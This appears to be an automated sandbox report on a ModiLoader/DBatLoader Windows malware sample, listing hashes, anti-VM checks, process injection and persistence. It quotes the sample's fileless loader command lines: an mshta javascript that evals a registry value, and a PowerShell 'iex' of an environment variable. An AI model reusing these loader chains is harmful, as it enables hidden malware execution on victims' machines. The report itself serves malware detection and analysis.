Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
08-05-2024 13:51
Static task
static1
Behavioral task
behavioral1
Sample
2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe
-
Size
356KB
-
MD5
2523d4c29b570652b608f5026b3f068e
-
SHA1
3049ffc7f7ecc9a8f24fbd9b67a91ccd44821cef
-
SHA256
856c83e4bd9e463cfc0ee5ad88ad9e459a540db080630ea19b9de42926ba4f2a
-
SHA512
f1abfe83f7ea506ad98391fff2f08cb22f71ee3717a6644cc78dc35152309a8cf44c753eaf5e984813e9290faba7f7721c3cfb7019daf594fa1c3d786403feda
-
SSDEEP
6144:5gb/TKVTqAJBfc3OfoaupVtN3AiD9C9uEGHKousVQIrwL4ONT+V7DM1AzzfRA273:ab/T6TqK9crpVPAiD9C9uEG7VxctVC7N
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 2672 mshta.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 57 IoCs
Processes:
resource yara_rule behavioral1/memory/1968-0-0x0000000000400000-0x0000000000460160-memory.dmp modiloader_stage2 behavioral1/memory/1968-2-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/1968-4-0x0000000000400000-0x0000000000460160-memory.dmp modiloader_stage2 behavioral1/memory/1968-7-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/1968-6-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/1968-5-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/1968-3-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/1968-8-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/1968-9-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/2248-14-0x00000000057E0000-0x00000000058BC000-memory.dmp modiloader_stage2 behavioral1/memory/2108-15-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-16-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-21-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-30-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-34-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-37-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-36-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-35-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-33-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-32-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-31-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-29-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-28-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-27-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-26-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-25-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-24-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-23-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-22-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-20-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-19-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2248-18-0x00000000057E0000-0x00000000058BC000-memory.dmp modiloader_stage2 behavioral1/memory/2108-38-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-39-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-40-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-41-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-43-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-42-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-44-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-52-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-47-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-46-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/2108-45-0x0000000000270000-0x00000000003BA000-memory.dmp modiloader_stage2 behavioral1/memory/1968-54-0x00000000004E0000-0x00000000005BC000-memory.dmp modiloader_stage2 behavioral1/memory/2188-61-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-65-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-62-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-63-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-64-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-73-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-72-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-71-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-70-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-69-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-68-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-67-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 behavioral1/memory/2188-66-0x00000000000D0000-0x000000000021A000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 2108 regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\cb8d1f\\a81118.bat\"" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exeregsvr32.exedescription pid process target process PID 2248 set thread context of 2108 2248 powershell.exe regsvr32.exe PID 2108 set thread context of 2188 2108 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:tF9In=\"jPn\";f8G=new ActiveXObject(\"WScript.Shell\");y40ydZj=\"hmfqG\";S4Z4aE=f8G.RegRead(\"HKCU\\\\software\\\\epsehio\\\\uqkiailgu\");t6c6Xw=\"Yu8FQ\";eval(S4Z4aE);X5FveniU=\"5ww\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0\ = "5d7e4d" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeregsvr32.exepid process 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe 2108 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 2248 powershell.exe 2108 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2248 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
mshta.exepowershell.exeregsvr32.exedescription pid process target process PID 2620 wrote to memory of 2248 2620 mshta.exe powershell.exe PID 2620 wrote to memory of 2248 2620 mshta.exe powershell.exe PID 2620 wrote to memory of 2248 2620 mshta.exe powershell.exe PID 2620 wrote to memory of 2248 2620 mshta.exe powershell.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2248 wrote to memory of 2108 2248 powershell.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe PID 2108 wrote to memory of 2188 2108 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"1⤵PID:1968
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:evu7Uft="uQfdRv";n34M=new%20ActiveXObject("WScript.Shell");rs3bwfqN="O";Lv74qy=n34M.RegRead("HKCU\\software\\B8HhGcjCN\\NI8xZRGM");QcY0x2uE="UPhI";eval(Lv74qy);Qa82xtZKR="f";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:swjn2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:2188
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
15KB
MD52949ce78f2b9e4f3b4e7cbd582776bc7
SHA1cc8f62b150f399561dbdf6af7fda2c1d05be3dbf
SHA256728c1f732efce403a0d343bb68f0f94e940d3fa24a5c319f415166a8b1f3ef8d
SHA512a5bdd32ec3c72a616036a0b26a8a9ba7e3762196aba86bcb7d19119388b71cca72eb957e3845298fcb01d709f126478a5bc677959dac0debec88ebfdbe43abf9
-
Filesize
71B
MD516c3800e39ce58c64e26b06547058a41
SHA1272c42f839cc8b74fcf517257bc8deb50d383770
SHA2562f34841c53225d8a1cd6a9541b657ddbdd31c9f17ed3e76beef32bad16391339
SHA512fe7c7cfd073723fd52a0603caf9f31064b24a1360c26cf673eb7fb0fd643b859a49dd68d3701f71d083513a9895c622fa5df3fbbae1d008c38bb28265d176699